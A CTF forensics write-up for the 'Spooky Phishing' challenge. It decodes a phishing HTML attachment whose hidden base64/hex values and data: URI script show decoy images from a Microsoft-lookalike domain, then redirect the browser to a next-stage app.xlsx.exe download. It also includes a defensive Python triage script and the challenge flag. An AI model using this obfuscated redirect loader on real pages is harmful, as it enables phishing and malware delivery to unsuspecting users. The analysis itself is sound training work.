Spooky Phishing

Challenge

  • CTF: Hack The Boo 2023 - Practice Official Writeup
  • Name: Spooky Phishing
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: A few citizens of the Spooky Country have been victims of a targeted phishing campaign. Inspired by the Halloween spirit, none of them was able to detect the attackers' trap. Can you analyze the malicious attachment and find the URL for the next attack stage?
  • Objective: Malware Delivery via Phishing

Files

Download: forensics_spooky_phishing.zip

Writeup

The challenge archive contains index.html, which carries base64-encoded payloads in two hidden <input> elements and in a <script> loaded from a base64 data: URI.

..[snip]..
<input class="li" hidden value="Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz">
<input class="il" hidden value="NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ==">
..[snip]..
<script src="data:text/javascript;base64,JChfID0+IHsKCiAgICBjb25zdCBuID0gYXRvYigkKCcuaWwnKS52YWwoKSk7CiAgICBjb25zdCBubiA9IGRlY29kZUhleChuKTsKCiAgICBkb2N1bWVudC5ib2R5LnN0eWxlLmJhY2tncm91bmRJbWFnZSA9ICd1cmwoaHR0cDovL21pY3Jvc29mdGNsb3Vkc2VydmljZXMuY29tL2ltYWdlcy8yNDQwNTc2MjQtYTY1M2MzOTktMWU2NC00NDRlLTg3OTItZTNkZmRjMjA0ZGZkLnBuZyknOwogICAgJCgnI2Jhbm5lcicpLmF0dHIoJ3NyYycsICdodHRwOi8vbWljcm9zb2Z0Y2xvdWRzZXJ2aWNlcy5jb20vaW1hZ2VzLzI0NDA1NzY3OS1mOTcxZjJlNi1hZjRhLTQwZjctOTIyNS03ZDRlOTI5ZWQzYWUucG5nJyk7CgogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgICAgY29uc3QgYSA9IGF0b2IoJCgnLmxpJykudmFsKCkpOwogICAgICAgIGNvbnN0IGFhID0gZGVjb2RlSGV4KGEpOwoKICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IGFhICsgbm47CiAgICB9LCAzNTAwKTsKfSk7CgpmdW5jdGlvbiBkZWNvZGVIZXgoaGV4eCkgewogICAgdmFyIGhleCA9IGhleHgudG9TdHJpbmcoKTsKICAgIHZhciBzdHIgPSAnJzsKICAgIGZvciAodmFyIGkgPSAwOyBpIDwgaGV4Lmxlbmd0aDsgaSArPSAyKQogICAgICAgIHN0ciArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGhleC5zdWJzdHIoaSwgMiksIDE2KSk7CiAgICByZXR1cm4gc3RyOwp9"></script>
..[snip]..

Decode:

echo -n 'JChfID0+IHsKCiAgICBjb25zdCBuID0gYXRvYigkKCcuaWwnKS52YWwoKSk7CiAgICBjb25zdCBubiA9IGRlY29kZUhleChuKTsKCiAgICBkb2N1bWVudC5ib2R5LnN0eWxlLmJhY2tncm91bmRJbWFnZSA9ICd1cmwoaHR0cDovL21pY3Jvc29mdGNsb3Vkc2VydmljZXMuY29tL2ltYWdlcy8yNDQwNTc2MjQtYTY1M2MzOTktMWU2NC00NDRlLTg3OTItZTNkZmRjMjA0ZGZkLnBuZyknOwogICAgJCgnI2Jhbm5lcicpLmF0dHIoJ3NyYycsICdodHRwOi8vbWljcm9zb2Z0Y2xvdWRzZXJ2aWNlcy5jb20vaW1hZ2VzLzI0NDA1NzY3OS1mOTcxZjJlNi1hZjRhLTQwZjctOTIyNS03ZDRlOTI5ZWQzYWUucG5nJyk7CgogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgICAgY29uc3QgYSA9IGF0b2IoJCgnLmxpJykudmFsKCkpOwogICAgICAgIGNvbnN0IGFhID0gZGVjb2RlSGV4KGEpOwoKICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IGFhICsgbm47CiAgICB9LCAzNTAwKTsKfSk7CgpmdW5jdGlvbiBkZWNvZGVIZXgoaGV4eCkgewogICAgdmFyIGhleCA9IGhleHgudG9TdHJpbmcoKTsKICAgIHZhciBzdHIgPSAnJzsKICAgIGZvciAodmFyIGkgPSAwOyBpIDwgaGV4Lmxlbmd0aDsgaSArPSAyKQogICAgICAgIHN0ciArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGhleC5zdWJzdHIoaSwgMiksIDE2KSk7CiAgICByZXR1cm4gc3RyOwp9' | base64 -d

Output:

$(_ => {

    const n = atob($('.il').val());
    const nn = decodeHex(n);

    document.body.style.backgroundImage = 'url(http://microsoftcloudservices.com/images/244057624-a653c399-1e64-444e-8792-e3dfdc204dfd.png)';
    $('#banner').attr('src', 'http://microsoftcloudservices.com/images/244057679-f971f2e6-af4a-40f7-9225-7d4e929ed3ae.png');

    setTimeout(() => {
        const a = atob($('.li').val());
        const aa = decodeHex(a);

        window.location.href = aa + nn;
    }, 3500);
});

function decodeHex(hexx) {
    var hex = hexx.toString();
    var str = '';
    for (var i = 0; i < hex.length; i += 2)
        str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
    return str;
}

The script reads the hidden .il and .li input values, base64-decodes each with atob(), hex-decodes the result with decodeHex(), sets two decoy image URLs on the page, and after 3.5 seconds redirects the browser to the concatenation of the two decoded strings (.li first, then .il). The following JavaScript reproduces that decoding to recover the redirect URL and the HTB{} flag.

// Constants from index.html
const li="Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz"
const il="NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ=="

// decodeHex() copied from the base64-encoded script in index.html
function decodeHex(hexx) {
    var hex = hexx.toString();
    var str = '';
    for (var i = 0; i < hex.length; i += 2)
        str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
    return str;
}

// Decode variables
const n = atob(il);
const nn = decodeHex(n);
const a = atob(li);
const aa = decodeHex(a);
const aa_nn = aa + nn;
console.log(aa_nn)

Output:

https://windowsliveupdater.htb/HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}/app.xlsx.exe
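As an added example (not part of the original writeup), the Python script below automates the triage done above for an attachment of this shape: it parses the HTML, collects hidden <input> values and any <script> loaded from a base64 data: URI, reverses the base64-then-hex layering, and reports the decoy image URLs, the redirect delay and the reconstructed next-stage URL. The embedded index.html is a constructed stand-in that reuses the input values and script shown in the listing above; the concatenation order (.li then .il) and the setTimeout delay pattern are taken from the decoded script, and names such as PayloadExtractor and analyse are this example's own.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed stand-in for the attachment: the two hidden inputs and the data: URI
# script are the values shown in the listing above; the surrounding markup is filler.
SAMPLE_HTML = """<html><body>
<img id="banner" src="">
<input class="li" hidden value="Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz">
<input class="il" hidden value="NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ==">
<script src="data:text/javascript;base64,JChfID0+IHsKCiAgICBjb25zdCBuID0gYXRvYigkKCcuaWwnKS52YWwoKSk7CiAgICBjb25zdCBubiA9IGRlY29kZUhleChuKTsKCiAgICBkb2N1bWVudC5ib2R5LnN0eWxlLmJhY2tncm91bmRJbWFnZSA9ICd1cmwoaHR0cDovL21pY3Jvc29mdGNsb3Vkc2VydmljZXMuY29tL2ltYWdlcy8yNDQwNTc2MjQtYTY1M2MzOTktMWU2NC00NDRlLTg3OTItZTNkZmRjMjA0ZGZkLnBuZyknOwogICAgJCgnI2Jhbm5lcicpLmF0dHIoJ3NyYycsICdodHRwOi8vbWljcm9zb2Z0Y2xvdWRzZXJ2aWNlcy5jb20vaW1hZ2VzLzI0NDA1NzY3OS1mOTcxZjJlNi1hZjRhLTQwZjctOTIyNS03ZDRlOTI5ZWQzYWUucG5nJyk7CgogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgICAgY29uc3QgYSA9IGF0b2IoJCgnLmxpJykudmFsKCkpOwogICAgICAgIGNvbnN0IGFhID0gZGVjb2RlSGV4KGEpOwoKICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IGFhICsgbm47CiAgICB9LCAzNTAwKTsKfSk7CgpmdW5jdGlvbiBkZWNvZGVIZXgoaGV4eCkgewogICAgdmFyIGhleCA9IGhleHgudG9TdHJpbmcoKTsKICAgIHZhciBzdHIgPSAnJzsKICAgIGZvciAodmFyIGkgPSAwOyBpIDwgaGV4Lmxlbmd0aDsgaSArPSAyKQogICAgICAgIHN0ciArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGhleC5zdWJzdHIoaSwgMiksIDE2KSk7CiAgICByZXR1cm4gc3RyOwp9"></script>
</body></html>
"""

URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
DATA_URI_RE = re.compile(r"^data:[^,]*;base64,(.+)$", re.S)
DELAY_RE = re.compile(r"\}\s*,\s*(\d+)\s*\)")  # the trailing "}, 3500)" of a setTimeout


class PayloadExtractor(HTMLParser):
    """Collect hidden <input> values keyed by class, plus decoded data: URI scripts."""

    def __init__(self):
        super().__init__()
        self.hidden_inputs = {}
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # a bare attribute such as `hidden` maps to None
        if tag == "input" and "hidden" in a and a.get("value"):
            self.hidden_inputs[a.get("class", "")] = a["value"]
        elif tag == "script":
            m = DATA_URI_RE.match(a.get("src") or "")
            if m:
                raw = base64.b64decode(m.group(1))
                self.scripts.append(raw.decode("utf-8", "replace"))


def unwrap(value):
    """Reverse the two layers the page applies: base64 (atob) and then hex (decodeHex)."""
    hex_text = base64.b64decode(value).decode("ascii")
    return bytes.fromhex(hex_text).decode("utf-8", "replace")


def analyse(html):
    """Return the indicators a triage of this attachment needs."""
    parser = PayloadExtractor()
    parser.feed(html)
    decoded = {cls: unwrap(v) for cls, v in parser.hidden_inputs.items()}
    script = "\n".join(parser.scripts)
    delay = DELAY_RE.search(script)
    return {
        "script": script,
        "decoy_urls": sorted(set(URL_RE.findall(script))),
        "decoded_inputs": decoded,
        # The decoded script sets location.href = decodeHex(atob(.li)) + decodeHex(atob(.il)).
        "next_stage_url": decoded.get("li", "") + decoded.get("il", ""),
        "delay_ms": int(delay.group(1)) if delay else None,
    }


REPORT = analyse(SAMPLE_HTML)

if __name__ == "__main__":
    for cls, text in REPORT["decoded_inputs"].items():
        print(f"input .{cls}: {text}")
    print("decoy image URLs:", *REPORT["decoy_urls"], sep="\n  ")
    print("redirect delay (ms):", REPORT["delay_ms"])
    print("next-stage URL:", REPORT["next_stage_url"])
```

Point analyse() at the real file contents instead of SAMPLE_HTML to run it against the actual attachment; the decoy image hostnames and the delayed redirect are the indicators worth blocking and alerting on, while the .htb next-stage URL is what the challenge asks for.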

Flag: HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}

This post is licensed under CC BY 4.0 by the author.